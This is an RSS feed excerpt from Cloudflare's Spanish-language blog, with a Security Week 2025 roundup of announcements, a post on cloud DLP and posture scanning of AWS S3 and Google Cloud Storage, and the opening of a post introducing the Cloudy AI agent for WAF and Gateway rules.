
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/es-es/" rel="self" type="application/rss+xml"/>
        <language>es-es</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Fri, 17 Apr 2026 09:48:48 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Security Week 2025: resumen]]></title>
            <link>https://blog.cloudflare.com/es-es/security-week-2025-wrap-up/</link>
            <pubDate>Mon, 24 Mar 2025 13:05:00 GMT</pubDate>
            <description><![CDATA[ La Security Week 2025, con novedades como un análisis detallado de nuestras soluciones de IA, una experiencia de navegación unificada y la presentación de nuestro agente de IA, Cloudy, llega a su fin. ]]></description>
            <content:encoded><![CDATA[ <p>Gracias por seguir otra Security Week de Cloudflare. Estamos muy orgullosos del trabajo que realiza nuestro equipo para mejorar la seguridad de Internet y ayudar a hacer frente al desafío de las amenazas emergentes. Como ha señalado nuestro director de seguridad de la información, Grant Bourzikas, en su <a href="https://blog.cloudflare.com/welcome-to-security-week-2025/"><u>publicación inicial</u></a> de esta semana, los equipos de seguridad afrontan un panorama cuya complejidad aumenta rápidamente debido a la proliferación de proveedores, al "boom de la IA" y a una superficie cada vez mayor que proteger.</p><p>Seguimos trabajando para hacer frente a los nuevos desafíos, y las Innovation Weeks, como la Security Week, nos brindan una valiosa oportunidad de compartir nuestro punto de vista y de relacionarnos con la comunidad de Internet en general. La misión de Cloudflare es <i>ayudar</i> a mejorar Internet. Queremos ayudar a salvaguardar Internet ante la llegada de los superordenadores cuánticos, proteger el medio de subsistencia de los creadores de contenido contra la extracción no autorizada de datos de la IA, concienciar sobre las últimas amenazas en Internet y encontrar nuevas formas de reducir la reutilización de contraseñas en riesgo. Resolver estos desafíos requerirá la colaboración de toda la comunidad. Agradecemos a todos los que han colaborado con nosotros en estos temas a través de las redes sociales, que han contribuido a <a href="https://github.com/cloudflare"><u>nuestros repositorios de código abierto</u></a> y que se han puesto en contacto con nosotros a través de nuestro <a href="https://www.cloudflare.com/partners/technology-partners/"><u>programa de socios tecnológicos</u></a> para trabajar con nosotros en los temas más importantes para ellos. Para nosotros, esa es la mejor parte.</p><p>Aquí tienes un resumen de los anuncios de esta semana:</p>
    <div>
      <h3>Ayudamos a mejorar la seguridad de Internet</h3>
      <a href="#ayudamos-a-mejorar-la-seguridad-de-internet">
        
      </a>
    </div>
    <table><tr><td><p><b>Título</b></p></td><td><p><b>Extracto</b></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/post-quantum-zero-trust/"><u>La criptografía convencional está en peligro. Cambia a la criptografía poscuántica con Cloudflare Zero Trust</u></a></p></td><td><p>Nos complace anunciar que las organizaciones ya pueden proteger el tráfico de datos confidenciales de su red corporativa contra amenazas cuánticas enrutándolo a un túnel a través de la plataforma Zero Trust de Cloudflare.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/how-cloudflare-is-using-automation-to-tackle-phishing/"><u>Cloudflare utiliza la automatización para abordar el phishing con firmeza</u></a></p></td><td><p>Cómo Cloudflare utiliza la información sobre amenazas y nuestros productos de la plataforma para desarrolladores para automatizar las denuncias de abuso de phishing.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/advancing-account-security-as-part-of-cloudflare-commitment-to-cisa-secure-by-design-pledge/"><u>Avances en la seguridad de las cuentas como parte del compromiso de Cloudflare con la iniciativa "Seguridad por diseño" de la CISA</u></a></p></td><td><p>Cloudflare ha logrado avances significativos en la promoción de la adopción de la autenticación multifactor (MFA). Con la incorporación de los inicios de sesión sociales de Apple y Google, hemos facilitado el acceso seguro a nuestros usuarios.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/email-security-now-available-for-free-for-political-parties-and-campaigns/"><u>Email Security, ya disponible de forma gratuita para partidos políticos y campañas en Cloudflare for Campaigns</u></a></p></td><td><p>Nos complace anunciar que Cloudflare for Campaigns incluye ahora el servicio Email Security, que añade una capa adicional de protección a los sistemas de correo electrónico que utilizan las campañas políticas.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/enhanced-security-and-simplified-controls-with-automated-botnet-protection/"><u>Más seguridad y controles más sencillos con protección automatizada contra botnets, suites de encriptación flexibles y actualizaciones de URL Scanner</u></a></p></td><td><p>¡Más seguridad, controles más sencillos! En esta edición de Security Week, Cloudflare presenta la protección automatizada contra botnets, suites de encriptación flexibles y actualizaciones de URL Scanner.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/password-reuse-rampant-half-user-logins-compromised/"><u>La reutilización de contraseñas es un problema generalizado: casi la mitad de los inicios de sesión de usuarios están comprometidos</u></a></p></td><td><p>Casi la mitad de los intentos de inicio de sesión en sitios web protegidos por Cloudflare se debieron a la filtración de credenciales. El problema generalizado de la reutilización de contraseñas está contribuyendo a que se produzcan ataques de bots automatizados a gran escala.</p></td></tr></table>
    <div>
      <h3>Investigación de amenazas de la red que ve más amenazas </h3>
      <a href="#investigacion-de-amenazas-de-la-red-que-ve-mas-amenazas">
        
      </a>
    </div>
    <table><tr><td><p><b>Título</b></p></td><td><p><b>Extracto</b></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/threat-events-platform/"><u>Mejora el contexto de la actividad de los ciberdelincuentes con nuestra plataforma de eventos de amenazas de Cloudflare One</u></a></p></td><td><p>Obtén información en tiempo real con nuestra nueva plataforma de eventos de amenazas  para mejorar tu protección con información práctica, anticiparte a los ataques y proteger tus activos críticos.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/cloudflare-security-posture-management/"><u>Una plataforma para gestionar la postura de seguridad predictiva de tu empresa con Cloudflare</u></a></p></td><td><p>Cloudflare presenta una sola plataforma para la gestión unificada de la postura de seguridad, que ayuda a proteger las aplicaciones SaaS y web implementadas en diversos entornos.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/monitoring-and-forensics/"><u>Cloudflare implementa la supervisión nativa y el análisis forense con Log Explorer y paneles de control personalizados</u></a></p></td><td><p>Nos complace anunciar la compatibilidad con los conjuntos de datos Zero Trust y los paneles de control personalizados, donde los clientes pueden supervisar métricas críticas para detectar las actividades sospechosas o inusuales.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/upgraded-turnstile-analytics-enable-deeper-insights-faster-investigations/"><u>Novedad: Turnstile Analytics: obtén información sobre el tráfico de tus visitantes, los patrones de comportamiento de los bots, las anomalías del tráfico y los atributos de los ataques.</u></a></p></td><td><p>Novedad: Turnstile Analytics: obtén información sobre el tráfico de tus visitantes, los patrones de comportamiento de los bots, las anomalías del tráfico y los atributos de los ataques.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/cloudflare-radar-ddos-leaked-credentials-bots/"><u>Ampliamos la información de seguridad de Cloudflare Radar con nuevos conjuntos de datos de ataques DDoS, credenciales filtradas y bots</u></a></p></td><td><p>Para la Security Week 2025, añadiremos varios gráficos nuevos centrados en los ataques DDoS, nuevos datos sobre las tendencias de las credenciales filtradas y una nueva página de bots en Cloudflare Radar.</p></td></tr></table>
    <div>
      <h3>Protegemos los modelos y contra las amenazas de la IA </h3>
      <a href="#protegemos-los-modelos-y-contra-las-amenazas-de-la-ia">
        
      </a>
    </div>
    <table><tr><td><p><b>Título</b></p></td><td><p><b>Extracto</b></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/cloudflare-for-ai-supporting-ai-adoption-at-scale-with-a-security-first-approach/"><u>Cloudflare for AI: implementa la IA a gran escala con un enfoque que prioriza la seguridad</u></a></p></td><td><p>Gracias a Cloudflare for AI, los desarrolladores, los equipos de seguridad y los creadores de contenido pueden utilizar la red y las herramientas de Cloudflare para proteger, observar y lograr aplicaciones de IA resilientes y seguras de utilizar.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/"><u>Entrenamos la IA para descubrir el código JavaScript malicioso y mejorar la seguridad de la navegación web</u></a></p></td><td><p>Más información sobre cómo Cloudflare ha desarrollado un modelo de IA para detectar el código JavaScript malicioso utilizando una red neuronal gráfica, desde el preprocesamiento de los datos hasta la inferencia a gran escala.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/an-early-look-at-cryptographic-watermarks-for-ai-generated-content/"><u>Análisis preliminar de las marcas de agua criptográficas para el contenido generado por IA</u></a></p></td><td><p>Es difícil distinguir entre el contenido web generado por humanos y aquel generado por IA. Adoptamos un nuevo enfoque que permite identificar el contenido generado por IA, sin afectar al rendimiento.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/ai-labyrinth/"><u>Cloudflare utiliza la IA generativa para ralentizar, confundir y malgastar recursos de los rastreadores de IA y otros bots que no respetan las directivas de no rastreo.</u></a></p></td><td><p>Cloudflare utiliza la IA generativa para ralentizar, confundir y malgastar recursos de los rastreadores de IA y otros bots que no respetan las directivas de no rastreo.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/"><u>Toma el control de la seguridad de las aplicaciones públicas de IA con Firewall for IA de Cloudflare</u></a></p></td><td><p>Firewall for AI detecta y protege las aplicaciones públicas basadas en LLM, y se integra perfectamente con el WAF de Cloudflare. Prueba ya la versión beta y toma el control de la seguridad de tu IA generativa</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/bots-heuristics/"><u>Mejora de la flexibilidad y la visibilidad de la gestión de bots con nueva heurística de alta precisión</u></a></p></td><td><p>Mediante el desarrollo y la integración de un nuevo marco heurístico en el motor de conjunto de reglas de Cloudflare, ahora tenemos un sistema más flexible para escribir reglas e implementar nuevas versiones rápidamente.</p></td></tr></table>
    <div>
      <h3>Simplificamos la seguridad</h3>
      <a href="#simplificamos-la-seguridad">
        
      </a>
    </div>
    <table><tr><td><p><b>Título</b></p></td><td><p><b>Extracto</b></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/introducing-ai-agent/"><u>Novedad: Cloudy, el agente de IA de Cloudflare para simplificar configuraciones complejas</u></a></p></td><td><p>El primer agente de IA de Cloudflare, Cloudy, ayuda a que las configuraciones complicadas sean fáciles de entender para los administradores de Cloudflare.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/new-application-security-experience/"><u>Simplifica la seguridad de las aplicaciones con una nueva experiencia de panel de control unificado</u></a></p></td><td><p>Presentamos una nueva experiencia de seguridad de las aplicaciones en el panel de control de Cloudflare, con una interfaz de usuario renovada, organizada por casos de uso, que facilita a los clientes la navegación y la protección de sus cuentas.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/improved-support-for-private-applications-and-reusable-access-policies-with-cloudflare-access/"><u>Mejor compatibilidad con las aplicaciones privadas y las políticas de acceso reutilizables con Cloudflare Access</u></a></p></td><td><p>Nos complace anunciar la compatibilidad con las aplicaciones definidas por direcciones IP y nombres de host privados, así como las políticas de acceso reutilizables.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/aegis-deep-dive/"><u>Simplifica la gestión de las listas de permitidos y bloquea el acceso al servidor de origen con Cloudflare Aegis</u></a></p></td><td><p>Cloudflare Aegis proporciona direcciones IP de salida dedicadas para estrategias de acceso Zero Trust al servidor de origen, que ahora admiten BYOIP y configurabilidad orientada al cliente, y próximamente con observabilidad de la utilización de las direcciones IP de Aegis.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/https-only-for-cloudflare-apis-shutting-the-door-on-cleartext-traffic"><u>HTTPS solo para las API de Cloudflare: cerramos la puerta al tráfico de texto sin cifrar</u></a></p></td><td><p>Cerramos por completo los puertos HTTP de texto sin cifrar para el tráfico de la API de Cloudflare. Esto evita el riesgo de que los clientes filtren involuntariamente sus claves API secretas en texto sin cifrar durante la solicitud inicial, antes de que podamos rechazar la conexión en el lado del servidor.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/cloudflare-named-leader-waf-forrester-2025/"><u>Cloudflare, reconocida como empresa líder en soluciones de firewall de aplicaciones web en el informe Forrester 2025</u></a></p></td><td><p>Forrester Research ha reconocido a Cloudflare como empresa líder en su informe "The Forrester Wave™: Web Application Firewall Solutions", 1.er trimestre de 2025.</p></td></tr></table>
    <div>
      <h3>Seguridad de los datos en todas partes y en todo momento </h3>
      <a href="#seguridad-de-los-datos-en-todas-partes-y-en-todo-momento">
        
      </a>
    </div>
    <table><tr><td><p><b>Título</b></p></td><td><p><b>Extracto</b></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/scan-cloud-dlp-with-casb"><u>Detecta los datos confidenciales y los errores de configuración en AWS y GCP con Cloudflare One</u></a></p></td><td><p>Con el CASB de Cloudflare, integra, analiza y detecta los datos confidenciales y los errores de configuración en tus cuentas de almacenamiento en la nube.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/browser-based-rdp"><u>RDP sin riesgos, la solución para navegadores de Cloudflare que protege el acceso de terceros</u></a></p></td><td><p>Cloudflare proporciona ahora compatibilidad con el protocolo de escritorio remoto (RDP) sin cliente y basada en navegador. Ofrece de forma nativa el acceso remoto y seguro a servidores Windows sin VPN ni clientes RDP, para admitir el acceso de terceros y la seguridad BYOD.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/improving-data-loss-prevention-accuracy-with-ai-context-analysis"><u>Mejora de la precisión de la prevención de pérdida de datos con el análisis de contexto de IA</u></a></p></td><td><p>La solución de prevención de pérdida de datos de Cloudflare reduce los falsos positivos mediante el uso de un algoritmo de IA de automejora, desarrollado en la plataforma para desarrolladores de Cloudflare, para mejorar la precisión de la detección mediante el análisis del contexto de la IA.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/enhance-data-protection-in-microsoft-outlook-with-cloudflare-ones-new-dlp"><u>Mejora la protección de datos en Microsoft Outlook con la nueva función DLP Assist de Cloudflare One</u></a></p></td><td><p>Ahora los clientes pueden proteger fácilmente sus datos confidenciales en Microsoft Outlook con nuestra nueva función DLP Assist.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/lattice-crypto-primer"><u>Preparación para la criptografía poscuántica: guía para principiantes sobre la criptografía basada en entramados</u></a></p></td><td><p>Esta publicación es una guía para principiantes sobre los entramados, las matemáticas en las que se basa la transición a la criptografía poscuántica. Explica cómo realizar la encriptación y la autenticación basadas en entramados desde cero.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/irap-protected-assessment"><u>Cloudflare ha obtenido el nivel de clasificación PROTECTED de la evaluación IRAP lo que avala nuestro compromiso con el sector público global</u></a></p></td><td><p>Cloudflare cuenta ahora con el nivel de clasificación PROTECTED del IRAP, lo que permite que nuestros productos y servicios lleguen al sector público australiano.</p></td></tr></table>
    <div>
      <h2>No te pierdas las últimas novedades en Cloudflare TV</h2>
      <a href="#no-te-pierdas-las-ultimas-novedades-en-cloudflare-tv">
        
      </a>
    </div>
    <p>Para obtener más información sobre muchos de los fantásticos anuncios de la Security Week, <a href="https://www.cloudflare.com/security-week-2025/cloudflare-tv/"><u>echa un vistazo a nuestra programación de Cloudflare TV</u></a>, donde nuestro equipo ofrece aún más detalles sobre nuestras últimas novedades. </p><div>
  
</div>
<p></p>
    <div>
      <h2>¡Nos vemos en nuestra próxima Innovation Week!</h2>
      <a href="#nos-vemos-en-nuestra-proxima-innovation-week">
        
      </a>
    </div>
    <p>Damos las gracias a todos los que os habéis tomado el tiempo de leer las publicaciones del blog de la Security Week de Cloudflare o de hablar con nosotros sobre estos temas a través de las redes sociales. Nuestra próxima semana de la innovación, <a href="https://www.cloudflare.com/developer-week-2024/updates/"><u>la Developer Week</u></a>, es en abril, así que está a la vuelta de la esquina. ¡Te esperamos!</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Seguridad de aplicaciones]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Seguridad del correo electrónico]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">57bTt5UYhnjdF2MwuEePqb</guid>
            <dc:creator>Kim Blight</dc:creator>
            <dc:creator>Adam Martinetti</dc:creator>
            <dc:creator>Alex Dunbrack</dc:creator>
        </item>
        <item>
            <title><![CDATA[Detecta los datos confidenciales y los errores de configuración en AWS y GCP con Cloudflare One]]></title>
            <link>https://blog.cloudflare.com/es-es/scan-cloud-dlp-with-casb/</link>
            <pubDate>Fri, 21 Mar 2025 13:10:00 GMT</pubDate>
            <description><![CDATA[ Con el CASB de Cloudflare, integra, analiza y detecta los datos confidenciales y los errores de configuración en tus cuentas de almacenamiento en la nube. ]]></description>
            <content:encoded><![CDATA[ <p>Hoy, cuando finaliza la Security Week 2025, una semana fantástica a lo largo de la cual hemos compartido multitud de publicaciones en el blog, sobre una gran variedad de temas, nos complace compartir las últimas novedades sobre los productos de seguridad de datos de Cloudflare.</p><p>Este anuncio nos lleva a la plataforma SASE de Cloudflare, <a href="https://www.cloudflare.com/zero-trust/products/"><u>Cloudflare One</u></a>, que utilizan los equipos informáticos y de seguridad de las empresas para gestionar la seguridad de sus usuarios, sus aplicaciones y sus herramientas de terceros, todo en un solo lugar.</p><p>A partir de hoy, los usuarios de Cloudflare One pueden utilizar el producto <a href="https://www.cloudflare.com/zero-trust/products/casb/"><u>CASB</u></a> (el agente de seguridad de acceso a la nube) para integrar y analizar Amazon Web Services (AWS) S3 y Google Cloud Storage (GCS), en busca de posibles problemas relacionados con la postura de seguridad y la prevención de pérdida de datos (DLP). <a href="https://dash.cloudflare.com/sign-up"><u>Crea una cuenta gratuita</u></a> para comprobarlo.</p><p>Mediante el análisis tanto puntual como continuo, los usuarios pueden identificar los errores de configuración en la gestión de identidad y acceso (IAM), los buckets y las configuraciones de objetos, así como detectar información confidencial (p. ej., números de la seguridad social, números de tarjetas de crédito o cualquier otro patrón que utilice expresiones regulares) en los objetos de almacenamiento en la nube.</p>
    <div>
      <h3>Prevención de pérdida de datos (DLP) en la nube</h3>
      <a href="#prevencion-de-perdida-de-datos-dlp-en-la-nube">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1R1bE9TRmTdHDTg1XeLS60/8269b687ec65e70bcaee437f30d5f590/1.png" />
          </figure><p>En los últimos años, nuestros clientes, sobre todo los equipos de informática y seguridad, nos han expresado su reconocimiento por la simplicidad y la eficacia de nuestra solución CASB como producto de seguridad SaaS. El gran número de <a href="https://developers.cloudflare.com/cloudflare-one/applications/casb/casb-integrations/"><u>integraciones con las que es compatible</u></a>, su facilidad de configuración y su rapidez para identificar problemas críticos en las plataformas SaaS más populares, como los archivos compartidos públicamente en Microsoft 365 y los datos confidenciales expuestos en Google Workspace, la han convertido en la opción preferida de muchos.</p><p>Sin embargo, conforme interactuamos con los clientes, una cosa era evidente: los riesgos de los datos en reposo no supervisados o expuestos van mucho más allá de los entornos SaaS. La información confidencial, ya sea propiedad intelectual, datos de clientes o identificadores personales, puede causar estragos en la reputación de una organización y en sus obligaciones para con sus clientes si cae en las manos equivocadas. Para muchos de nuestros clientes, la seguridad de los datos almacenados en proveedores de nube como AWS y GCP es incluso más importante que la seguridad de los datos en sus herramientas SaaS.</p><p>Por este motivo, hemos ampliado Cloudflare CASB para incluir la funcionalidad <a href="https://developers.cloudflare.com/cloudflare-one/policies/data-loss-prevention/"><u>de prevención de pérdida de datos (DLP) en la nube</u></a>, que permite a los usuarios analizar los objetos en buckets de Amazon S3 y Google Cloud Storage en busca de coincidencias con datos confidenciales​.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5TKXiAkQKxw3GFQBCuQLjX/198e4620da8239280eff669b7b62678b/2.png" />
          </figure><p>Con la solución de <a href="https://www.cloudflare.com/zero-trust/products/dlp/"><u>prevención de perdida de datos (DLP) de Cloudflare</u></a>, puedes elegir entre perfiles de detección predefinidos que buscan tipos de datos comunes (como números de la seguridad social o números de tarjetas de crédito) o bien crear tus propios perfiles personalizados utilizando expresiones regulares. En cuanto se detecta un objeto que coincide con un perfil de DLP, puedes acceder a información más detallada, comprender el contexto del archivo, ver a quién pertenece y mucho más. Estas funciones proporcionan la información necesaria para proteger rápidamente los datos y evitar la exposición en tiempo real.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4cyOaQJ0ZyPO8r7LyeU6ON/30b8453888d6cb13dcb15225f875a0cd/3.png" />
          </figure><p>Al igual que con todas las integraciones de CASB, esta nueva funcionalidad también incluye funciones de gestión de la postura de seguridad. Esto significa que tanto si utilizas AWS como GCP, te ayudaremos a identificar los errores de configuración y otros problemas de la seguridad en la nube que podrían dejar tus datos vulnerables, como buckets accesibles públicamente o que tengan desactivadas configuraciones de registro esenciales, claves de acceso que necesiten rotación o usuarios sin <a href="https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/"><u>autenticación multifactor (MFA)</u></a>. Todo ello está incluido.</p>
    <div>
      <h3>Sencillo por defecto, configurable donde quieras</h3>
      <a href="#sencillo-por-defecto-configurable-donde-quieras">
        
      </a>
    </div>
    <p>Las soluciones CASB y DLP de Cloudflare son fáciles de usar por defecto, por lo que puedes empezar a utilizarlas rápida y fácilmente. También son muy configurables, ya que te ofrecen la flexibilidad de ajustar los perfiles de análisis para adaptarlos a tus necesidades específicas.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5MLh3y7SMHnX52cjuu4pmE/b7bb67497fc21bc9d3f3f740a9b3fe52/4.png" />
          </figure><p>Por ejemplo, puedes ajustar qué buckets de almacenamiento o qué tipos de archivo quieres analizar, e incluso analizar solo una muestra de los objetos, eligiendo el porcentaje que deseas​. El análisis también se ejecuta en tu propio entorno de nube, por lo que tus datos nunca salen de tu infraestructura​. Este enfoque garantiza la seguridad de tu almacenamiento en la nube y la gestión de tus costes, al mismo tiempo que te permite adaptar la solución a los requisitos específicos de conformidad y seguridad de tu organización.</p><p>De cara al futuro, nuestra hoja de ruta también incluye añadir compatibilidad con otros entornos de almacenamiento en la nube, como Azure Blob Storage y Cloudflare R2, y ampliar así aún más nuestra estrategia integral de seguridad multinube. ¡No te lo pierdas!</p>
    <div>
      <h3>Cómo funciona</h3>
      <a href="#como-funciona">
        
      </a>
    </div>
    <p>Desde el principio, sabíamos que para ofrecer capacidades de DLP en los entornos de nube era necesario un diseño eficiente y escalable que permitiera la detección en tiempo real de la exposición de datos confidenciales.</p>
    <div>
      <h4>Arquitectura sin servidor para un procesamiento optimizado</h4>
      <a href="#arquitectura-sin-servidor-para-un-procesamiento-optimizado">
        
      </a>
    </div>
    <p>Desde el principio tomamos la decisión de utilizar un enfoque de arquitectura sin servidor para garantizar la eficiencia y la escalabilidad de la detección de datos confidenciales. Así es como funciona:</p><ul><li><p><b>Cuenta de proceso</b>: todo el proceso se ejecuta en una cuenta en la nube propiedad de tu organización (conocida como cuenta de proceso). Este diseño garantiza que tus datos no salen de los límites de tu entorno, evitando costosas tarifas de salida de la nube. La cuenta de proceso se puede iniciar en menos de 15 minutos mediante una plantilla Terraform proporcionada.</p></li><li><p><b>Función de controlador</b>: cada minuto, una función de controlador ligera y sin servidor en tu entorno de nube se comunica con las API de Cloudflare, obteniendo las últimas configuraciones de DLP y los perfiles de seguridad de tu cuenta de Cloudflare One.</p></li><li><p><b>Proceso de rastreador</b>: el controlador activa una tarea de detección de objetos, que procesa una segunda función sin servidor (conocida como rastreador). El rastreador consulta las cuentas de almacenamiento en la nube, como AWS S3 o Google Cloud Storage, a través de la API para identificar los nuevos objetos. En la cuenta de proceso se utiliza Redis para rastrear qué objetos aún no se han evaluado.</p></li><li><p><b>Análisis de datos confidenciales</b>: los nuevos objetos detectados se envían a través de una cola a una tercera función sin servidor, el explorador. Esta función descarga los objetos y transmite su contenido al motor DLP en la cuenta de proceso, que busca coincidencias con los perfiles DLP predefinidos o personalizados.</p></li><li><p><b>Generación y alertas de hallazgos</b>: si se encuentra una coincidencia de DLP, los metadatos sobre el objeto, como el contexto y los detalles de propiedad, se publican en una cola. Estos datos los ingiere un servicio alojado en Cloudflare y se presentan en el panel de control de Cloudflare como hallazgos, lo que ofrece a los equipos de seguridad la visibilidad necesaria para tomar rápidamente las medidas necesarias.</p></li></ul>
    <div>
      <h4>Diseño escalable y seguro</h4>
      <a href="#diseno-escalable-y-seguro">
        
      </a>
    </div>
    <p>El proceso de DLP garantiza que los datos confidenciales nunca salen de tu entorno en la nube, un enfoque que prioriza la privacidad. Toda la comunicación entre la cuenta de proceso y las API de Cloudflare la inicia el controlador, lo que significa también que no es necesario realizar ninguna configuración adicional para permitir el tráfico de entrada.</p>
    <div>
      <h3>Cómo empezar</h3>
      <a href="#como-empezar">
        
      </a>
    </div>
    <p>Para empezar, ponte en contacto con tu equipo de cuenta para obtener más información sobre esta nueva funcionalidad de seguridad de datos y sobre nuestra hoja de ruta. Si quieres probarla por ti mismo, puedes iniciar sesión en el panel de control de Cloudflare One (si no tienes una cuenta, crea una <a href="https://www.cloudflare.com/zero-trust/products/"><u>gratis aquí</u></a>) y accede a la página de CASB para configurar tu primera integración.</p>
    <div>
      <h3>Ver en Cloudflare TV</h3>
      <a href="#ver-en-cloudflare-tv">
        
      </a>
    </div>
    <div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[DLP]]></category>
            <category><![CDATA[AWS]]></category>
            <category><![CDATA[Google Cloud]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <guid isPermaLink="false">2hlOlV28pXRFpnmnkqbbhw</guid>
            <dc:creator>Alex Dunbrack</dc:creator>
            <dc:creator>Michael Leslie </dc:creator>
        </item>
        <item>
            <title><![CDATA[Novedad: Cloudy, el agente de IA de Cloudflare para simplificar configuraciones complejas]]></title>
            <link>https://blog.cloudflare.com/es-es/introducing-ai-agent/</link>
            <pubDate>Thu, 20 Mar 2025 13:10:00 GMT</pubDate>
            <description><![CDATA[ El primer agente de IA de Cloudflare, Cloudy, ayuda a que las configuraciones complicadas sean fáciles de entender para los administradores de Cloudflare. ]]></description>
            <content:encoded><![CDATA[ <p>¡Es un gran día aquí en Cloudflare! No solo es la Security Week, sino que hoy marca el primer paso de Cloudflare hacia un área de funcionalidad completamente nueva, cuyo objetivo es mejorar la forma en que nuestros usuarios interactúan con todos nuestros productos y obtienen valor de ellos.</p><p>Estamos encantados de compartir una primera aproximación a cómo estamos integrando las funciones de IA en la gestión de los productos de Cloudflare que ya conoces y valoras. ¿Nuestra primera misión? Centrarnos en la seguridad y optimizar la experiencia de gestión de reglas y políticas. El objetivo es automatizar la tediosa tarea de revisar y contextualizar manualmente las reglas personalizadas en el WAF de Cloudflare, y las políticas de Gateway en Cloudflare One, para que puedas comprender al instante qué hace cada política, cuáles son sus vulnerabilidades y qué debes hacer para corregirlas.</p>
    <div>
      <h3>¡Conoce Cloudy, el primer agente de IA de Cloudflare!</h3>
      <a href="#conoce-cloudy-el-primer-agente-de-ia-de-cloudflare">
        
      </a>
    </div>
    <p>Nuestro primer paso hacia una experiencia de producto totalmente habilitada para la IA es la introducción de <i>Cloudy</i>, la primera versión de los agentes de IA de Cloudflare, una funcionalidad similar a un asistente diseñada para ayudar a los usuarios a comprender y mejorar rápidamente sus configuraciones de Cloudflare en varias áreas del conjunto de productos. Empezarás a ver la funcionalidad de Cloudy perfectamente integrada en dos productos de Cloudflare en el panel de control, de los que hablaremos a continuación.</p><p>Aunque el nombre, <i>Cloudy</i>, pueda sonar divertido y desenfadado, nuestros objetivos son más serios: llevar Cloudy y la funcionalidad basada en la IA a todos los rincones de Cloudflare, y optimizar la forma en que nuestros usuarios operan y gestionan sus productos favoritos de Cloudflare. Empecemos con dos lugares donde Cloudy ya está disponible para todos los clientes que utilizan los productos WAF y Gateway.</p>
    <div>
      <h3>Reglas personalizadas del WAF</h3>
      <a href="#reglas-personalizadas-del-waf">
        
      </a>
    </div>
    <p>Empecemos con una descripción general basada en la IA de las <a href="https://developers.cloudflare.com/waf/custom-rules/"><u>reglas personalizadas del WAF</u></a>. Para aquellos que no estén familiarizados con el firewall de aplicaciones web (WAF) de Cloudflare, este ayuda a proteger las aplicaciones web contra ataques como la inyección de código SQL, el scripting entre sitios (XSS) y otras vulnerabilidades. </p><p>Una función específica del WAF es la capacidad de crear reglas personalizadas del WAF. Estas permiten a los usuarios personalizar las políticas de seguridad para bloquear, desafiar o permitir el tráfico en función de atributos o criterios de seguridad específicos.</p><p>Sin embargo, para los clientes que tienen docenas o incluso cientos de reglas implementadas en su organización, puede ser difícil garantizar una visión clara de su postura de seguridad. Las configuraciones de reglas evolucionan con el tiempo, a menudo gestionadas por distintos miembros del equipo, lo que genera posibles ineficiencias y vulnerabilidades de seguridad. ¿Podría haber otro problema mejor que resolver para Cloudy?</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4zcFRfhRWGQWhoza9TolDu/25e1357540db32e59150609e6eddd1e0/BLOG-2692_2.png" />
